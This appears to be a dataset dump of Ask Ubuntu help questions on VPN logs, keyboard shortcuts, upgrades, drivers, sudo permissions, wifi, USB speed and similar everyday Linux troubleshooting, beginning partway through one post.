175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : keeping refhim=4294901761 during rekey may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : next payload type of isakmp hash payload has an unknown value : 77 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : malformed payload in packet may 24 11:25:53 vpngw pluto [ 4571 ] : | payload malformed after iv may 24 11:25:53 vpngw pluto [ 4571 ] : | e4 39 cd 3c 1b 07 70 25 7e 00 be a8 6c 5b 67 d7 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : sending notification payload_malformed to 175.157.198.74:15338 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : state_quick_r2 : ipsec sa established transport mode { esp= > 0x423b8f6e < 0xb8fa12f4 xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0xa06b29f8 ) payload : deleting ipsec state # 14 may 24 11:25:53 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/1701 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : responding to quick mode proposal { msgid:04000000 } may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : them : 175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : keeping refhim=4294901761 during rekey may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 16 : state_quick_r2 : ipsec sa established transport mode { esp= > 0x48ba2bb8 < 0xa098a46f xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0x423b8f6e ) payload : deleting ipsec state # 15 may 24 11:25:55 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/1701 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : responding to quick mode proposal { msgid:05000000 } may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : them : 175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : keeping refhim=4294901761 during rekey may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 17 : state_quick_r2 : ipsec sa established transport mode { esp= > 0x35104388 < 0x68c76fe2 xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0x48ba2bb8 ) payload : deleting ipsec state # 16 may 24 11:26:03 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/1701 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : responding to quick mode proposal { msgid:06000000 } may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : them : 175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : keeping refhim=4294901761 during rekey may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 18 : state_quick_r2 : ipsec sa established transport mode { esp= > 0xd1077552 < 0x34ad5c6b xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0x35104388 ) payload : deleting ipsec state # 17 may 24 11:26:13 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:26:24 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0xd1077552 ) payload : deleting ipsec state # 18 may 24 11:26:24 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : error : netlink xfrm_msg_delpolicy response for flow eroute_connection delete included errno 2 : no such file or directory may 24 11:26:24 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:26:24 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa payload : deleting isakmp state # 11 may 24 11:26:24 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 : deleting connection `` l2tp-psk-nat '' instance with peer 175.157.198.74 { isakmp= # 0/ipsec= # 0 } may 24 11:26:24 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15338 : received and ignored informational message may 24 11:26:57 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : max number of retransmissions ( 2 ) reached state_main_r1 may 24 11:26:57 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 : deleting connection `` l2tp-psk-nat '' instance with peer 175.157.198.74 { isakmp= # 0/ipsec= # 0 } once again sorry for the very long posting , but i hope you guys can help me to sort out this issue . thanks .
299361	alt+ctrl behavior different from ctrl+alt ?	specifically i am trying to use the workspace switching shortcut ctrl+alt+←↑→↓ . they work fine when i press alt then ctrl then an arrow key , but not when i do ctrl then alt . this behavior even carries over for the ctrl+alt+shift+arrow commands for moving windows between workspaces . i am certain this behavior was not always so . how can i get back to the usual ctrl/alt order invariance ? ubuntu 12.10 64-bit . edit : turns out this only happens when the num lock key is on . i have no reason to ever have num lock off , so i would really like to understand why num lock is somehow changing my ctrl+alt behavior . edit 2 : this only happens with the left alt key .
299362	connecting my sony ericsson experia is giving me problems	i am trying to connect my phone to transfer pictures and video . ubuntu 12.04 lts is finding the phone when i connect it but it can not find any files . this is the error msg : kunne ikke vise alt innhold for «lt18i» : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . the norwegian part says : could not show all content for `` lt18i ''
299363	peculiar icon specification in .desktop file	i have installed a windows program ( evernote ) on my ubuntu 13.04 system using wine . during installation a desktop shortcut was created containing ( among others ) this line : icon=63ec_evernote.0 this results in the evernote logo icon being displayed , which is fine . but i wonder what 's going on here . what exactly does 63ec_evernote.0 mean ? i checked the freedesktop specification , but i did n't find it particularly useful .
299365	trouble upgrading ubuntu 11.10 to 12.04 lts after upgrading from 10.04	so first i tried to upgrade from 10.04 to 11.10 and now i do n't have access to the many features of ubuntu ( since the upgrade did not complete successfully ) so when i try to update the system with sudo apt-get upgrade ( after updating ) i get the following : '' please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original source list was saved in /etc/apt/sources/list.distupgrade systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 ) could not install the upgrade the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure-a ) upgrade complete the upgrade has completed but there were some errors in the upgrade processing '' how does anyone recommend i tackle this problem ? i do not really want to re-install ubuntu since it could erase all my data ( most recent , but not recently saved in backup ) ; moreover the following make things much weirder . for example , the system is somehow not capable of doing a backup , saving files in another usb or hard drive ( saves them as 0 bytes ) . please help , ubuntu one does not upload my files either ( fyi ) . thanks for your help .
299371	correct way to install a custom upstart service	i am using upstart for services on my servers . writing a conf file and placing it in /etc/init is easy enough , but that does n't seem to completely install . for one , the service -- status-all does n't list my new service . i checked and if i make a link in /etc/init.d to /lib/init/ubstart-job it 'll show up in the status . but doing this manually makes me think i 'm not doing it right , and there may well be other configuration steps which are n't being done . what is the correct way to install an upstart service such that it is properly registered in all tools dealing with services ?
299373	how to install drivers for switchable graphics for hp dv6 7040tx	i have a laptop with dual graphics cards : 1.intel graphics 4000 2.nvidia geforce 630m i wanted to completely switch over from windows to ubuntu 13.04 : ) but , i am very new to this environment.. in windows , it switched automatically from one card to another based on the load . i wanted to install drivers . i read up on bumblebee . i also went through `` additional drivers '' from ubuntu software center . so , i 'm really not sure whether installing either will solve the problem . i want as it was in windows : that is , i wanted to switch over to nvidia 630m if i play games . i want to make use of intel 4000 if i do n't play.. please , give me a step-by-step guide as i 'm not familiar with ubuntu . thank you : )
299375	system and preferences icon vanished from menu bar	on my ubuntu12.04 screen launcher , system and preferences icon has got vanished.. there used to be system and preferences icon on left vertical panel ( launcher ) , now that is not visible , how to add it again to menubar ? ? right now i am using `` gnome-control-center `` this command to open that , but i want it back on launcher , thanks
299377	why do some icon themes have so many different sizes ?	[ 12:24 pm ] /usr/share/icons/hicolor $ ls 128x128 192x192 24x24 32x32 48x48 64x64 96x96 index.theme 16x16 22x22 256x256 36x36 512x512 72x72 icon-theme.cache scalable [ 12:24 pm ] /usr/share/icons/hicolor $ by trial and error , i 've figured out that 16x16 , 22x22 , 24x24 , and 48x48 icons are used in lubuntu 13.04 . i may have seen icons corresponding to 64x64 and 128x128 being used but i 'm not sure . but what are all the other sizes for ? are they needed for very large screens ?
299384	ubuntu sudo not working	i wanted to move a file to a /usr/python2.7/ but i was unable to do so , so i changed the permissions of /usr to myuser : sudo chown -r ***** /usr it worked but i realised it was a blunder when sudo stopped working after that . it says : sudo : effective uid is not 0 , is sudo installed setuid root ? i have seen this post where the accepted solution was to use the policykit : pkexec chown root : root /usr/bin/sudo pkexec chmod 4755 /usr/bin/sudo however , even the policykit is saying that : pkexec must be setuid root please help , i 've learned a lesson and will never change permissions for /usr again . please help me this time !
299391	401 authorization in python 3	i need a little help with python3 code . i wrote a code for python2 , but after a little modifications in python3 , i ca n't get this code working again . can you provide me any ideas , what and how can be done , to get this code working again ? # ! /usr/bin/env python # # python3 version http client # import urllib.parse import urllib.request import time param1 = 'value1' param2 = 'value2' tm = 60 while true : url = `` http : //a.w.com/ ? link=11 & u=10 '' values = { 'param1 ' : value1 , 'param2 ' : value2 } data = urllib.parse.urlencode ( values ) binary_data = data.encode ( 'ascii ' ) req = urllib.request.request ( url , binary_data ) urllib.request.urlopen ( req ) # find only cmd output : result = re.search ( 'wireless ( . * ) < /div > ' , data ) print ( result.group ( 1 ) ) code seems to be ok , but i need to add here basic auth login functionality . i know that in python 3 auth was changed to oauth , but i do n't know how should i prepare this code to working . any idea is welcome .
299392	lan not working while laptop on battery	my wired lan is not working when my laptop is on battery - anyone out there who knows where to look for a solution ? strange thing is , that the lan port is not entirely switched off , as there 's light in the link and activity leds , it just does n't work when the laptop is on battery - but the wireless lan is working fine ...
299393	ubuntu 13.04 failed to start any gui application as root	i just installed ubuntu 13.04 in family machine , and i faced strange problem even though my sudo password is correct , i can not start any gui application ( i.e . bleachbit ( as root ) ) as a root , the system will not except my password . i can use terminal to open gui application , however , this machine is for my family and i do not want them to miss up the system by playing with terminal , i searched for a while in the internet trying to find solution but i could not , to cover the basics below is my /etc/group and /etc/soduers i am a member of sudo group and adm group i added my name as member of root group but i did not work , still the system will not except my password in any gui application i will inter my password three times then the system will clam i used wrong password /etc/soduers # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d /etc/group root : x:0 : daemon : x:1 : bin : x:2 : sys : x:3 : adm : x:4 : ubuntu tty : x:5 : disk : x:6 : lp : x:7 : mail : x:8 : news : x:9 : uucp : x:10 : man : x:12 : proxy : x:13 : kmem : x:15 : dialout : x:20 : ubuntu fax : x:21 : voice : x:22 : cdrom : x:24 : ubuntu floppy : x:25 : ubuntu tape : x:26 : sudo : x:27 : ubuntu audio : x:29 : pulse dip : x:30 : ubuntu www-data : x:33 : backup : x:34 : operator : x:37 : list : x:38 : irc : x:39 : src : x:40 : gnats : x:41 : shadow : x:42 : utmp : x:43 : video : x:44 : sasl : x:45 : plugdev : x:46 : ubuntu staff : x:50 : games : x:60 : users : x:100 : nogroup : x:65534 : libuuid : x:101 : crontab : x:102 : syslog : x:103 : fuse : x:104 : messagebus : x:105 : avahi-autoipd : x:106 : ssl-cert : x:107 : lpadmin : x:108 : ubuntu netdev : x:109 : whoopsie : x:110 : mlocate : x:111 : ssh : x:112 : utempter : x:113 : rtkit : x:114 : bluetooth : x:115 : lightdm : x:116 : nopasswdlogin : x:117 : avahi : x:118 : scanner : x:119 : colord : x:120 : pulse : x:121 : pulse-access : x:122 : saned : x:123 : ubuntu : x:1000 : sambashare : x:124 : ubuntu vboxusers : x:125 : ubuntu i hope some one can help thanks
299396	how to reduce the size of initrd.img on ubuntu 13.04	with my latest upgrade to ubuntu 13.04 , the initrd.img-3.8.0-21-generic file is now 32m . this is creating me problem with upgrading to newer kernels as i have /boot partition of just 96mb . what can i do to reduce the size of this file ?
299398	mozilla thunderbird spellcheck has too many languages	when i write an email in mozilla , the spellcheck shows 21 entries for spanish ( cuba , ecuador , spain ... ) 3 entries for english ( australia , uk , us ) , 4 entries for french ( modern , classic , reform , classic/reform ) . is there a way to make it show up only the ones i am interested in ( for example , spanish ( spain ) , english ( us ) , french ( modern ) ) ? it is very uncomfortable to search for the language i need among them all . i found this bug report : https : //bugs.launchpad.net/ubuntu/+source/thunderbird/+bug/651586 but seems it is not solved . any clues ? thanks in advance
299402	update pci.ids file to check for cuda compatibility	i 'm going through cuda 's documentation and following this page ( cuda toolkit documentation ) to see whether or not my machine and distro can support it . to verify if i have a cuda capable gpu , i had to enter this command lspci | grep -i nvidia upon entering this command i got no result , and i followed it up by entering this update-pciids ^^i got the following result upon entering the aforementioned command update-pciids : /usr/share/misc/pci.ids.new is read-only any ideas on how to verify the compatibility of my card with cuda ?
299404	wifi does not working on the laptop | не работает wifi на icl si 152	i have a problem : wifi does not work on the laptop at all . tired all of the methods described on the internet . module there seems to be realtek . system : ubuntu 12.10 x32 please help ! sorry for grammatical errors . здравствуйте ! у меня такая проблема : не работает wifi на ноутбуке , вообще . переробовал все методы описанные в интернете . модуль вроде-бы realtek . p.s помню когда стояла windows 8 - пришлось вручную искать и ставить драйвер , только после этого wifi заработал . пожалуйста помогите ! очень нужно , сижу с 3g модема .
299408	getting a brother hl-2250dn printer to work over ethernet	for 3 years i had an hp officejet g55 running on ubuntu - great ! loved it , all was simple and just worked ... then it broke . i ordered a new printer a brother hl-2250dn . i 've got the drivers from brother , so usb is okay . networked ... for the rest of my laptops and computers ... no it is using gutenprint - nice project but printing at a resolution of 100 is just diabolical . how i wish i could just go back to my officejet g55 . i know this is due to hardware manufacturers , but how do i just use my printer ?
299413	two java jdk version is running in my machine	i have the following configuration in my system : 2gb ram 64 bit system linux 12.0.1 the problem is when open the eclipse the system become very slow and if i open chrome it becoming too slow . and i checked in the system there were two java version is running 1 . java jdk5 2 . java jdk6 please help to fix this .
299414	is there in ubuntu repository monitoring alternative to nagios ?	i would like to run some kind of service monitoring for my server and few other servers/services . basically i want to monitor availability and send mail , when avail . is bad . is there any simple alternative to nagios in ubuntu repo ?
299415	update linux headers when kernel is updated	any time ubuntu wants to upgrade my kernel , it does n't seem to upgrade the headers at the same time . this results in certain drivers not being rebuilt such as wireless and virtualbox drivers . i always have to manually install the headers after the update and then rebuild the virtualbox drivers sudo apt-get install linux-headers-3.5.0-31-generic sudo /etc/init.d/vboxdrv setup is there a way to have the headers update at the same time ? it 's very frustrating at times cause if i do it at home , i only use wireless and after the update i ca n't update the headers unless i pull out an ethernet cable to plug in .
299417	does it make sense to create swap partitions for new installations nowadways ?	for a desktop installation in a new and shiny laptop ( let 's say 16gb ram and ssd hd ) , does it make sense to have a swap partition ?
299423	could someone improve kernel upgrade scripts with virtualbox install ?	ubuntu kernel updates are very frequent . each time kernel is updated i need install kernel-headers and do /etc/init.d/vboxdrv setup 多could kernel update script check if is needed and do it properly ? i suppose that i could do it but i do n't known where should be the correct place to post it and also if there is some major cause due it has n't done yet .
299424	urdu fonts not rendering properly in chrome	chrome in ubuntu is not rendering the urdu fonts properly.it is showing gibberish characters not able to read . especially on facebook font is not working . ahh after a long time im back . still not working . i copied some urdu fonts under ~/.fonts and under /usr/share/fonts/ and updated the cache and then restarted the chrome but even that didnt worked this is how it is appearing on my system i have installed mscore fonts and many other fonts but still not working
299426	completely removing smart scopes	i want to know if it 's possible to remove the unity smart scopes ? basically i like to keep a lean machine . i always remove just about everything i can - i actually only use the app and file lens ' , i do n't use any of the others so i remove them . i 'm not going to use the smart scopes because i do n't want information being sent to 3rd parties ( even canonical ) . i like unity so i would like to keep using unity , but i just want to remove smart scopes ... there are going to be a lot of them i know , which means that the list to remove is going to be long , but synaptic or a quick bit of sudo apt-get purge should take care of that . there are the privacy controls there which will let me prevent the smart scopes from working , but i want to remove them . so the question is simple ... can the smart scopes be removed ? can i still just leave the app and file lens ' locally without any of the smart scope stuff .
299428	my process is already daemonized before calling fork	i am starting process with upstart , to run as service using following command but looks like before i call the fork in main ( ) of testservice it 's already running as daemon . any ideas what could be wrong ? i use the following command in upstart config file exec start-stop-daemon -s -x testservice br -s
299430	slow usb transfer speeds	i am experiencing very slow usb transfer speeds when trying to backup files to a usb hdd . i am not entirely sure when the problem 1st occured but there was definitely a period using 12.04 where transfer speeds were fine and then they dropped to kbs/s and backups became impossible . it might well have coincided with a software update but at the time i thought maybe the usb hdd was at fault and did n't make a note of any software changes . i have since used other usb hdds and see the same issue . i have also upgraded to 13.04 and the problem remains . the details of my machine are as follows : lscpi : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 06:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 26bd:9917 bus 001 device 004 : id 0bda:0139 realtek semiconductor corp. card reader bus 002 device 005 : id 046d : c52e logitech , inc . bus 002 device 003 : id 04f2 : b277 chicony electronics co. , ltd bus 002 device 004 : id 0489 : e00d foxconn / hon hai broadcom bluetooth 2.1 device dmesg : [ 434.552616 ] usb 1-1.2 : new high-speed usb device number 5 using ehci-pci [ 435.950539 ] usb 1-1.2 : new usb device found , idvendor=26bd , idproduct=9917 [ 435.950555 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 435.950563 ] usb 1-1.2 : product : portable ssd [ 435.950570 ] usb 1-1.2 : manufacturer : integral [ 435.950575 ] usb 1-1.2 : serialnumber : 07073404d5442a05 [ 436.120805 ] initializing usb mass storage driver ... [ 436.121280 ] scsi7 : usb-storage 1-1.2:1.0 [ 436.121562 ] usbcore : registered new interface driver usb-storage [ 436.121569 ] usb mass storage support registered . [ 437.448442 ] scsi 7:0:0:0 : direct-access integral portable ssd pmap pq : 0 ansi : 6 [ 437.450971 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 [ 437.947534 ] sd 7:0:0:0 : [ sdc ] 246546432 512-byte logical blocks : ( 126 gb/117 gib ) [ 438.247077 ] sd 7:0:0:0 : [ sdc ] write protect is off [ 438.247085 ] sd 7:0:0:0 : [ sdc ] mode sense : 45 00 00 00 [ 438.546644 ] sd 7:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 440.643704 ] sdc : sdc1 [ 442.341191 ] sd 7:0:0:0 : [ sdc ] attached scsi removable disk [ 450.103616 ] systemd-hostnamed [ 3254 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! i have noticed that one of my usb sockets on the laptop seems to come up as usb 1-1.2 in dmesg whereas the others come up as 2-1.2 . potentially this is the source of the problem , i.e . one usb is usb 1 whereas the rest are usb 2 ? subjectively , luckybackup does seem to run a lot quicker when i plug the usb hdd in any othe usb port than the one that dmesg is reporting as 1-1.2
299431	is it possible to put x to sleep , leaving the rest of the system awake ?	imagine a computer with two functions : a fileserver and local webserver , required 24/7 . a graphical server for a media centre , only required when somebody is using it . i am considering building such a machine so allow me to kick some of the disks out of my incredibly power-hungry desktop and replacing our slow 2nd-gen atom media centre . the problem with this build is xbmc is a power-eating beast . left to its own devices , the cpu will never enter anything even close to a sleep state . things have improved but the only way to be efficient is to put it in s3 sleep . obviously this shuts down anything running . we currently wake over usb ( a ir receiver ) . s3 sleep would n't be possible on new machine because i would want it running server things but , i 'd like to put the x server ( and all its clients ) to sleep . if that 's possible . is it ? failing that , i can always quit x but that would lose xbmc 's state and i 'd rather avoid that . if that 's the only method , can you suggest a way to reinitialise x from an ir command ? ( and in a way that does n't clash with xbmc 's handling of ir ) . note : i 'm completely flexible with the graphical stack . it 's currently just x and nodm loading a standalone version of xbmc but if what you need requires something else , that 's fine . i 'm also able to test this ahead of building a new machine ( on the current one ) .
299432	rsync between my home computer and work computer	i have a computer at home and i want to rsync one folder with a folder on my server so that i can update it , say everyday . i have already read this answer but i do n't understand the numbers and how do i know my hostname etc etc . is there a simpler way to do this ? i mean for someone who is n't really knowledgable on the subject ? i have ubuntu at home and i think opensuse at work . thanks
299435	problem with wireless after upgrading to kernel 3.9.3	this is my first post . so forgive me if i 'm not giving all the details . my os : - ubuntu 13.04 my problem is , after upgrading to kernel 3.9.3 ( from kernel.org ) , i 'm not able to access my wireless network . the wireless button in my laptop indicates that it 's on , but it is not being detected . i have gone through all the posts and have tried all the stuffs , but no results . this is the output of lshw -c network network -network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0a:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d4500000-d4503fff -network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth0 version : 07 serial : 08:2e:5f:71:37:90 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : d4404000-d4404fff memory : d4400000-d4403fff the following is the output of lspci|grep network command 0a:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) the following is the output of rfkill list command 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no please help thankyou in advance
